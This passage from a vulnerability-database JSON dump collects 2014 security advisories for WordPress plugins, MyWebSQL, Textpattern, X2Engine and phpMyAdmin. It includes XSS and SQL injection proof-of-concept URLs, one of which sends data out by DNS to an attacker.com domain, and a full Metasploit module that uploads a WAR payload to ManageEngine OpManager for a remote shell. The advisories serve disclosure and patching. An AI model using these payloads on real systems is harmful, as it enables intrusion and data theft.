ID: HTB23233 \nProduct: Contact Form DB WordPress plugin \nVendor: Michael Simpson \nVulnerable Version(s): 2.8.13 and probably prior \nTested Version: 2.8.13 \nAdvisory Publication: September 17, 2014 [without technical details] \nVendor Notification: September 17, 2014 \nVendor Patch: September 25, 2014 \nPublic Disclosure: October 8, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-7139 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered two XSS vulnerabilities in Contact Form DB WordPress plugin, which can be exploited to perform Cross-Site Scripting (XSS) attacks against administrator of a WordPress website with vulnerable plugin installed. \n \n1) Two Cross-Site Scripting (XSS) Vulnerabilities in Contact Form DB WordPress Plugin: CVE-2014-7139 \n \n1.1 Input passed via the \"form\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&form=%27%22%3E%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n1.2 Input passed via the \"enc\" HTTP GET parameter to \"/wp-admin/admin.php\" script is not properly sanitised before being returned to the user. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. \n \nThe exploitation example below uses the \"alert()\" JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/wp-admin/admin.php?page=CF7DBPluginShortCodeBuilder&enc=%27%22%29;%3Cscript%3Ealert%28/immuniweb/%29;%3C/script%3E \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Contact Form DB 2.8.16. \n \nMore Information: \nhttps://wordpress.org/plugins/contact-form-7-to-database-extension/changelog/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23233 - https://www.htbridge.com/advisory/HTB23233 - Tow XSS in Contact Form DB WordPress Plugin. \n[2] Contact Form DB WordPress plugin - http://wordpress.org/plugins/contact-form-7-to-database-extension/ - Save form submissions to the database from Contact Form 7, Fast Secure Contact Form, JetPack Contact Form and Gravity Forms. Includes exports and short codes. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128625/wpcontactformdb-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2016-12-05T22:25:11", "references": [], "edition": 1, "description": "", "reporter": "Pedro Ribeiro", "published": "2014-09-29T00:00:00", "title": "ManageEngine OpManager / Social IT Arbitrary File Upload", "type": "packetstorm", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6034"], "modified": "2014-09-29T00:00:00", "href": "https://packetstormsecurity.com/files/128477/ManageEngine-OpManager-Social-IT-Arbitrary-File-Upload.html", "id": "PACKETSTORM:128477", "sourceData": "`## \n# This module requires Metasploit: http//metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'ManageEngine OpManager / Social IT Arbitrary File Upload', \n'Description' => %q{ \nThis module exploits a file upload vulnerability in ManageEngine OpManager and Social IT. \nThe vulnerability exists in the FileCollector servlet which accepts unauthenticated \nfile uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on \nversion 11.0 of SocialIT for Windows and Linux. \n}, \n'Author' => \n[ \n'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module \n], \n'License' => MSF_LICENSE, \n'References' => \n[ \n[ 'CVE', '2014-6034' ], \n[ 'OSVDB', '112276' ], \n[ 'URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/ManageEngine/me_opmanager_socialit_it360.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2014/Sep/110' ] \n], \n'Privileged' => true, \n'Platform' => 'java', \n'Arch' => ARCH_JAVA, \n'Targets' => \n[ \n[ 'OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal', { } ] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Sep 27 2014')) \n \nregister_options( \n[ \nOpt::RPORT(80), \nOptInt.new('SLEEP', \n[true, 'Seconds to sleep while we wait for WAR deployment', 15]), \n], self.class) \nend \n \ndef check \nres = send_request_cgi({ \n'uri' => normalize_uri(\"/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector\"), \n'method' => 'GET' \n}) \n \n# A GET request on this servlet returns \"405 Method not allowed\" \nif res and res.code == 405 \nreturn Exploit::CheckCode::Detected \nend \n \nreturn Exploit::CheckCode::Safe \nend \n \n \ndef upload_war_and_exec(try_again, app_base) \ntomcat_path = '../../../tomcat/' \nservlet_path = '/servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector' \n \nif try_again \n# We failed to obtain a shell. Either the target is not vulnerable or the Tomcat configuration \n# does not allow us to deploy WARs. Fix that by uploading a new context.xml file. \n# The file we are uploading has the same content apart from privileged=\"false\" and lots of XML comments. \n# After replacing the context.xml file let's upload the WAR again. \nprint_status(\"#{peer} - Replacing Tomcat context file\") \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => %q{<?xml version='1.0' encoding='utf-8'?><Context privileged=\"true\"><WatchedResource>WEB-INF/web.xml</WatchedResource></Context>}, \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => tomcat_path + \"conf\", \n'FILENAME' => \"context.xml\" \n} \n}) \nelse \n# We need to create the upload directories before our first attempt to upload the WAR. \nprint_status(\"#{peer} - Creating upload directories\") \nbogus_file = rand_text_alphanumeric(4 + rand(32 - 4)) \nsend_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => rand_text_alphanumeric(4 + rand(32 - 4)), \n'ctype' => 'application/xml', \n'vars_get' => { \n'regionID' => \"\", \n'FILENAME' => bogus_file \n} \n}) \nregister_files_for_cleanup(\"state/archivedata/zip/\" + bogus_file) \nend \n \nwar_payload = payload.encoded_war({ :app_name => app_base }).to_s \n \nprint_status(\"#{peer} - Uploading WAR file...\") \nres = send_request_cgi({ \n'uri' => normalize_uri(servlet_path), \n'method' => 'POST', \n'data' => war_payload, \n'ctype' => 'application/octet-stream', \n'vars_get' => { \n'regionID' => tomcat_path + \"webapps\", \n'FILENAME' => app_base + \".war\" \n} \n}) \n \n# The server either returns a 500 error or a 200 OK when the upload is successful. \nif res and (res.code == 500 or res.code == 200) \nprint_status(\"#{peer} - Upload appears to have been successful, waiting \" + datastore['SLEEP'].to_s + \n\" seconds for deployment\") \nsleep(datastore['SLEEP']) \nelse \nfail_with(Exploit::Failure::Unknown, \"#{peer} - WAR upload failed\") \nend \n \nprint_status(\"#{peer} - Executing payload, wait for session...\") \nsend_request_cgi({ \n'uri' => normalize_uri(app_base, Rex::Text.rand_text_alpha(rand(8)+8)), \n'method' => 'GET' \n}) \nend \n \n \ndef exploit \napp_base = rand_text_alphanumeric(4 + rand(32 - 4)) \n \nupload_war_and_exec(false, app_base) \nregister_files_for_cleanup(\"tomcat/webapps/\" + \"#{app_base}.war\") \n \nsleep_counter = 0 \nwhile not session_created? \nif sleep_counter == datastore['SLEEP'] \nprint_error(\"#{peer} - Failed to get a shell, let's try one more time\") \nupload_war_and_exec(true, app_base) \nreturn \nend \n \nsleep(1) \nsleep_counter += 1 \nend \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128477/opmanager_socialit_file_upload.rb.txt", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-12-05T22:17:52", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-09-03T00:00:00", "type": "packetstorm", "title": "MyWebSQL 3.4 Cross Site Scripting", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4735"], "modified": "2014-09-03T00:00:00", "href": "https://packetstormsecurity.com/files/128140/MyWebSQL-3.4-Cross-Site-Scripting.html", "id": "PACKETSTORM:128140", "sourceData": "`Advisory ID: HTB23221 \nProduct: MyWebSQL \nVendor: http://mywebsql.net/ \nVulnerable Version(s): 3.4 and probably prior \nTested Version: 3.4 \nAdvisory Publication: June 25, 2014 [without technical details] \nVendor Notification: June 25, 2014 \nPublic Disclosure: September 3, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-4735 \nRisk Level: Low \nCVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N) \nSolution Status: Solution Available \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered vulnerability in MyWebSQL, which can be exploited to perform Cross-Site Scripting (XSS) attacks. \n \n \n1) Reflected Cross-Site Scripting (XSS) in MyWebSQL: CVE-2014-4735 \n \nThe vulnerability is caused by insufficient sanitization of the \"table\" HTTP GET parameter passed to \"/index.php\" script. A remote attacker can trick a logged-in administrator to open a specially crafted link and execute arbitrary HTML and script code in browser in context of vulnerable website. Further exploitation of this vulnerability may grant an attacker full access to the website's databases and get complete control over it. \n \nThe following exploitation example uses the alert() JavaScript function to display \"immuniweb\" word: \n \nhttp://[host]/?q=wrkfrm&type=exporttbl&table=%27;%3C/script%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E \n \n \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nDisclosure timeline: \n2014-06-25 Vendor alerted via emails and contact form. \n2014-07-03 Vendor alerted via emails, contact form and twitter. \n2014-07-03 Vendor replied that he received information. \n2014-07-10 Fix requested. \n2014-07-10 Vendor requested to move public disclosure date to August 30. \n2014-08-27 Fix requested. \n2014-08-27 Vendor didn't release any patch and agreed to disclose on August 30 without patch. \n2014-08-27 Disclosure date moved to September 3. \n2014-09-01 Fix requested. \n2014-09-03 Public disclosure, patch by HTB Research is available. \n \nCurrently we are not aware of any official solution for this vulnerability. \nUnofficial patch was developed by High-Tech Bridge Security Research Lab and is available here: https://www.htbridge.com/advisory/HTB23221-patch.zip \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23221 - https://www.htbridge.com/advisory/HTB23221 - Cross-Site Scripting (XSS) in MyWebSQL. \n[2] MyWebSQL - http://mywebsql.net/ - MyWebSQL is the ultimate desktop replacement for managing your MySQL databases over the web. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128140/mywebsql-xss.txt"}, {"lastseen": "2016-12-05T22:13:41", "references": [], "edition": 1, "description": "", "reporter": "High-Tech Bridge SA", "published": "2014-09-25T00:00:00", "type": "packetstorm", "title": "All In One WP Security 3.8.2 SQL Injection", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-6242"], "modified": "2014-09-25T00:00:00", "href": "https://packetstormsecurity.com/files/128419/All-In-One-WP-Security-3.8.2-SQL-Injection.html", "id": "PACKETSTORM:128419", "sourceData": "`Advisory ID: HTB23231 \nProduct: All In One WP Security WordPress plugin \nVendor: Tips and Tricks HQ, Peter, Ruhul, Ivy \nVulnerable Version(s): 3.8.2 and probably prior \nTested Version: 3.8.2 \nAdvisory Publication: September 3, 2014 [without technical details] \nVendor Notification: September 3, 2014 \nVendor Patch: September 12, 2014 \nPublic Disclosure: September 24, 2014 \nVulnerability Type: SQL Injection [CWE-89] \nCVE Reference: CVE-2014-6242 \nRisk Level: Medium \nCVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. \n \n \n1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242 \n \n1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"orderby\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"orderby\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.: \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \n \n1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the \"order\" HTTP GET parameters to \"/wp-admin/admin.php\" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. \n \nThe PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the \"order\" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of \".attacker.com\" (a domain name, DNS server of which is controlled by the attacker): \n \nhttp://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29 \n \nThis vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.: \n \n<img src=\"http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29\"> \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to All In One WP Security 3.8.3 \n \nMore Information: \nhttps://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/ \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin. \n[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128419/aiowpsecurity-sql.txt"}, {"lastseen": "2016-12-05T22:12:15", "references": [], "edition": 1, "description": "", "reporter": "EgiX", "published": "2014-09-23T00:00:00", "type": "packetstorm", "title": "X2Engine 4.1.7 PHP Object Injection", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-5297"], "modified": "2014-09-23T00:00:00", "href": "https://packetstormsecurity.com/files/128352/X2Engine-4.1.7-PHP-Object-Injection.html", "id": "PACKETSTORM:128352", "sourceData": "`------------------------------------------------------------------------- \nX2Engine <= 4.1.7 (SiteController.php) PHP Object Injection Vulnerability \n------------------------------------------------------------------------- \n \n \n[-] Software Link: \n \nhttp://www.x2engine.com/ \n \n \n[-] Affected Versions: \n \nAll versions from 2.8 to 4.1.7. \n \n \n[-] Vulnerability Description: \n \nThe vulnerable code is located in the \"actionSendErrorReport\" method defined in /protected/controllers/SiteController.php: \n \n153. public function actionSendErrorReport(){ \n154. if(isset($_POST['report'])){ \n155. $errorReport = $_POST['report']; \n156. $errorReport = unserialize(base64_decode($errorReport)); \n157. if(isset($_POST['email'])){ \n158. $errorReport['email'] = $_POST['email']; \n159. } \n \nUser input passed through the \"report\" POST parameter is not properly sanitized before being used in a call to the \"unserialize()\" \nfunction at line 156. This can be exploited to inject arbitrary PHP objects into the application scope, and could allow an \nattacker to carry out Server-Side Request Forgery (SSRF) and possibly other attacks via specially crafted serialized objects. \n \n \n[-] Solution: \n \nApply the vendor patch or update to version 4.2 or later. \n \n \n[-] Disclosure Timeline: \n \n[31/07/2014] - Vendor notified \n[31/07/2014] - Vendor released security patch: http://x2community.com/?showtopic=1804 \n[01/08/2014] - CVE number requested \n[16/08/2014] - CVE number assigned \n[05/09/2014] - Version 4.2 released \n[23/09/2014] - Public disclosure \n \n \n[-] CVE Reference: \n \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) \nhas assigned the name CVE-2014-5297 to this vulnerability. \n \n \n[-] Credits: \n \nVulnerability discovered by Egidio Romano. \n \n \n[-] Original Advisory: \n \nhttp://karmainsecurity.com/KIS-2014-09 \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/128352/KIS-2014-09.txt"}, {"lastseen": "2016-12-05T22:21:23", "references": [], "description": "", "edition": 1, "reporter": "High-Tech Bridge SA", "published": "2014-10-01T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "Textpattern 4.5.5 Cross Site Scripting", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-4737"], "modified": "2014-10-01T00:00:00", "id": "PACKETSTORM:128519", "href": "https://packetstormsecurity.com/files/128519/Textpattern-4.5.5-Cross-Site-Scripting.html", "sourceData": "`Advisory ID: HTB23223 \nProduct: Textpattern \nVendor: http://textpattern.com/ \nVulnerable Version(s): 4.5.5 and probably prior \nTested Version: 4.5.5 \nAdvisory Publication: July 9, 2014 [without technical details] \nVendor Notification: July 9, 2014 \nVendor Patch: September 20, 2014 \nPublic Disclosure: October 1, 2014 \nVulnerability Type: Cross-Site Scripting [CWE-79] \nCVE Reference: CVE-2014-4737 \nRisk Level: Medium \nCVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N) \nSolution Status: Fixed by Vendor \nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) \n \n----------------------------------------------------------------------------------------------- \n \nAdvisory Details: \n \nHigh-Tech Bridge Security Research Lab discovered XSS vulnerability in Textpattern, which can be exploited to perform Cross-Site Scripting attacks against users of vulnerable application. \n \n1) Reflected Cross-Site Scripting (XSS) in Textpattern: CVE-2014-4737 \n \nThe vulnerability exists due to insufficient sanitization of input data passed via URI after \"/textpattern/setup/index.php\" script that is not deleted by default. \n \nA remote attacker can trick a logged-in user to open a specially crafted link and execute arbitrary HTML and script code in browser in context of the vulnerable website. Further exploitation of the vulnerability may allow an attacker to perform phishing attacks and potentially gain unauthorized access to the website. \n \nThe following exploitation example uses the JavaScript \"alert()\" function to display \"immuniweb\" word: \n \nhttp://[host]/textpattern/setup/index.php/%22%3E%3Cscript%3Ealert%28immuniweb%29;%3C/script%3E/index.php \n \n----------------------------------------------------------------------------------------------- \n \nSolution: \n \nUpdate to Textpattern 4.5.7 \n \nMore Information: \nhttp://textpattern.com/weblog/379/textpattern-cms-457-released-ten-years-on \n \n----------------------------------------------------------------------------------------------- \n \nReferences: \n \n[1] High-Tech Bridge Advisory HTB23223 - https://www.htbridge.com/advisory/HTB23223 - Cross-Site Scripting (XSS) in Textpattern. \n[2] Textpattern - http://textpattern.com/ - A flexible, elegant and easy-to-use CMS. \n[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE\u00ae is a dictionary of publicly known information security vulnerabilities and exposures. \n[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. \n[5] ImmuniWeb\u00ae SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. \n \n----------------------------------------------------------------------------------------------- \n \nDisclaimer: The information provided in this Advisory is provided \"as is\" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/128519/textpattern455-xss.txt", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "freebsd": [{"lastseen": "2018-08-31T01:14:49", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2014-4.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-7.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-5.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-6.php"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.6", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "lt"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "eq"}], "description": "\nThe phpMyAdmin development team reports:\n\nSelf-XSS due to unescaped HTML output in database\n\t structure page.\nWith a crafted table comment, it is possible to trigger\n\t an XSS in database structure page.\n\n\nSelf-XSS due to unescaped HTML output in database\n\t triggers page.\nWhen navigating into the database triggers page, it is\n\t possible to trigger an XSS with a crafted trigger\n\t name.\n\n\nMultiple XSS in AJAX confirmation messages.\nWith a crafted column name it is possible to trigger an\n\t XSS when dropping the column in table structure page. With\n\t a crafted table name it is possible to trigger an XSS when\n\t dropping or truncating the table in table operations\n\t page.\n\n\nAccess for an unprivileged user to MySQL user list.\nAn unpriviledged user could view the MySQL user list and\n\t manipulate the tabs displayed in phpMyAdmin for them.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-07-18T00:00:00", "title": "phpMyAdmin -- multiple XSS vulnerabilities, missing validation", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-4954", "CVE-2014-4986", "CVE-2014-4955", "CVE-2014-4987"], "modified": "2014-07-20T00:00:00", "id": "3F09CA29-0E48-11E4-B17A-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/3f09ca29-0e48-11e4-b17a-6805ca0b3d42.html", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T01:14:49", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2014-2.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-3.php"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.1.0", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "eq"}, {"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.4", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "lt"}], "description": "\nThe phpMyAdmin development team reports:\n\nSelf-XSS due to unescaped HTML output in recent/favorite\n\t tables navigation.\nWhen marking a crafted database or table name as\n\t favorite or having it in recent tables, it is possible to\n\t trigger an XSS.\nThis vulnerability can be triggered only by someone who\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the required\n\t form.\n\n\nSelf-XSS due to unescaped HTML output in navigation items\n\t hiding feature.\nWhen hiding or unhiding a crafted table name in the\n\t navigation, it is possible to trigger an XSS.\nThis vulnerability can be triggered only by someone who\n\t logged in to phpMyAdmin, as the usual token protection\n\t prevents non-logged-in users from accessing the required\n\t form.\n\n", "edition": 3, "reporter": "FreeBSD", "published": "2014-06-20T00:00:00", "title": "phpMyAdmin -- two XSS vulnerabilities due to unescaped db/table names", "type": "freebsd", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-4348", "CVE-2014-4349"], "modified": "2014-06-24T00:00:00", "id": "C4892644-F8C6-11E3-9F45-6805CA0B3D42", "href": "https://vuxml.freebsd.org/freebsd/c4892644-f8c6-11e3-9f45-6805ca0b3d42.html", "cvss": {"score": 3.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T01:14:48", "references": ["http://www.phpmyadmin.net/home_page/security/PMASA-2014-9.php", "http://www.phpmyadmin.net/home_page/security/PMASA-2014-8.php"], "affectedPackage": [{"OS": "FreeBSD", "OSVersion": "any", "packageVersion": "4.2.7.1", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "phpMyAdmin", "operator": "lt"}, 